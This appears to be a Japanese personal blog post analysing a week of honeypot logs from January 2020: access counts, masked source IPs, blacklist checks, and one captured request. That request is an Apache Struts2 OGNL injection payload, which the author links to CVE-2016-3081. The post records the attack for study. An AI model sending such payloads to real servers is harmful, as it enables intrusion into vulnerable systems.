ハニポのログ解析-20200105to20200113

はじめに

2020年になり一度からしたハニポを再開しモチベ維持のためブログを書くことにした 以上、次から解析結果

アクセス元と総数について

総アクセス数:404件

トップ3が下のような感じになる。 こういう時にどうするのがベストなのか不明なのでマスクする

IPアドレス 回数
xxx.37.213.98 60
xxx.101.0.209 21
xxx.186.19.221 11

多かった上二つはもうちょい解析する。 便宜上、上から①と②と③で使い分けることにする

Aguseにかけてみる

Aguseはブラックリスト判定を持つためその結果がどうなったかを記載する

IP 判定
中国 2つでCAUTION判定
ロシア 2つでCAUTION判定
中国 2つでCAUTION判定

CAUTION判定が出たものはいずれも同じブラックリスト(The spamhaus project,CBL)で判定された。

トップのアクセスのペイロードを確認する

基本的にはGETアクセスのためbotであると思われるが、一部長いペイロードがあり、それを確認するとApache Struts2への攻撃であった。

GET //#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)?(#req=@org.apache.struts2.ServletActionContext@getRequest(),#wr=#context[#parameters.obj[0]].getWriter(),#wr.println(#req.getRealPath(#parameters.pp[0])),#wr.flush(),#wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=/ 
HTTP/1.1
Host: xxx.xxx.xxx.xxx
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.12.4
Content-type: application/x-www-form-urlencoded

Struts2でOGNLを用いた脆弱性は調べてみるとCVE-2016-3081やCVE-2017-5638,CVE-2018-11776があります。 CVE-2017-5638はContent-Typeにペイロードをいれ、CVE-201-11776はstrut2-showcaseがターゲットになるため これはCVE-2016-3081の攻撃とみていいと思う。

ggってみると下記の記事に出くわす。下記の記事のファイルアップロードと似ている。

Struts2 vulnerability analysis and how to prevent _java in advance

疲れたのでここまで。